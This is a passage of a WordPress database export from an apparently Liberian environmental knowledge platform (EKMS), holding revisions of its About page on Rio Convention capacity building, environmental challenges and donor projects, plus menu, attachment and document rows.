Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>\n<h4>B.2 Selected Scenario</h4>\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<p style=\"background-color: lightgray;\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.</p>\n<h4>B.3 Knowledge Management</h4>\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).</p>\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.</p>\n<p>The project’s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and partner institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-20 09:20:24','2019-11-20 09:20:24','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(2592,1,'2019-11-20 09:22:02','2019-11-20 09:22:02','<h2>About the EKMS</h2>\n<h2>Why was the EKMS created?</h2>\n<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul>\n<p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015).&nbsp;</p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia.&nbsp;</p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions.&nbsp;</p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization.&nbsp;</p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>\n<h4>B.2 Selected Scenario</h4>\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<p style=\"background-color: lightgray;\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.</p>\n<h4>B.3 Knowledge Management</h4>\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).</p>\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.</p>\n<p>The project’s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.</p>\n<h2>What does the EKMS include?</h2>\n\n<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->\n\n<h2>Acknowledgement</h2>\n<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).</p>\n<h2>Disclaimer</h2>\n<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and partner institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-20 09:22:02','2019-11-20 09:22:02','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(2593,1,'2019-11-20 09:24:11','2019-11-20 09:24:11','','About Us Sidebar','','publish','closed','closed','','about-us-sidebar','','','2019-11-20 09:25:03','2019-11-20 09:25:03','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2593',0,'sidebar','',0),(2594,1,'2019-11-20 09:23:15','2019-11-20 09:23:15','','','','publish','closed','closed','','2594','','','2019-11-20 09:23:28','2019-11-20 09:23:28','',2593,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2594',1,'condition_group','',0),(2596,1,'2022-08-22 10:08:38','2019-11-20 10:39:41','','Startup Online Meetings','','publish','closed','closed','','startup-online-meetings','','','2022-08-22 10:08:38','2022-08-22 10:08:38','',0,'https://ekmsliberia.info/?p=2596',16,'nav_menu_item','',0),(2597,1,'2019-11-20 10:42:17','2019-11-20 10:42:17',' ','','','publish','closed','closed','','2597','','','2019-11-20 10:42:17','2019-11-20 10:42:17','',0,'https://ekmsliberia.info/?p=2597',5,'nav_menu_item','',0),(2599,1,'2019-11-20 11:10:11','2019-11-20 11:10:11','','Hydrological Survey','','publish','closed','closed','','hydrological-survey','','','2019-11-20 11:34:57','2019-11-20 11:34:57','',0,'https://ekmsliberia.info/?p=2599',3,'nav_menu_item','',0),(2600,1,'2019-11-20 11:10:11','2019-11-20 11:10:11','','Liberian Geological Survey','','publish','closed','closed','','liberian-geological-survey','','','2019-11-20 11:34:57','2019-11-20 11:34:57','',0,'https://ekmsliberia.info/?p=2600',4,'nav_menu_item','',0),(2602,1,'2019-11-20 11:36:12','2019-11-20 11:36:12','','Infrastructure Implementation Unit','','publish','closed','closed','','infrastructure-implementation-unit','','','2019-11-23 15:52:04','2019-11-23 15:52:04','',0,'https://ekmsliberia.info/?p=2602',2,'nav_menu_item','',0),(2604,1,'2019-11-20 11:56:41','2019-11-20 11:56:41','','lgslogo','','inherit','open','closed','','lgslogo','','','2021-08-17 18:59:10','2021-08-17 18:59:10','',1608,'https://ekmsliberia.info/wp-content/uploads/2019/11/lgslogo.jpg',0,'attachment','image/jpeg',0),(2605,1,'2019-11-20 13:00:32','2019-11-20 13:00:32','<h2>Access reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-20 13:00:32','2019-11-20 13:00:32','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(2607,1,'2019-11-20 13:28:24','2019-11-20 13:28:24','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-20 13:28:24','2019-11-20 13:28:24','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(2609,1,'2019-11-20 14:45:56','2019-11-20 14:45:56','Liberia as party to the Convention on International Trade in Endangered Species (CITES) which requires signatories to protect certain species of wild flora and fauna, including timber species against illegal trade and to the Convention on Biological Diversity (CBD) which requires in-\r\nsitu conservation of ecosystems and natural habitats and the maintenance and recovery of viable populations of species in their natural surroundings','National Wildlife Conservation and Protected Area Management Law','','publish','closed','closed','','national-wildlife-conservation-and-protected-area-management-law','','','2022-12-06 11:11:24','2022-12-06 11:11:24','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2609',117,'document','',0),(2610,1,'2019-11-20 14:42:51','2019-11-20 14:42:51','','2016 National Wildlife & Protected Area Law-2','','inherit','open','closed','','2016-national-wildlife-protected-area-law-2','','','2019-11-20 14:42:51','2019-11-20 14:42:51','',2609,'https://ekmsliberia.info/wp-content/uploads/2019/11/2016-National-Wildlife-Protected-Area-Law-2.pdf',0,'attachment','application/pdf',0),(2615,1,'2019-11-20 16:12:31','2019-11-20 16:12:31','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" 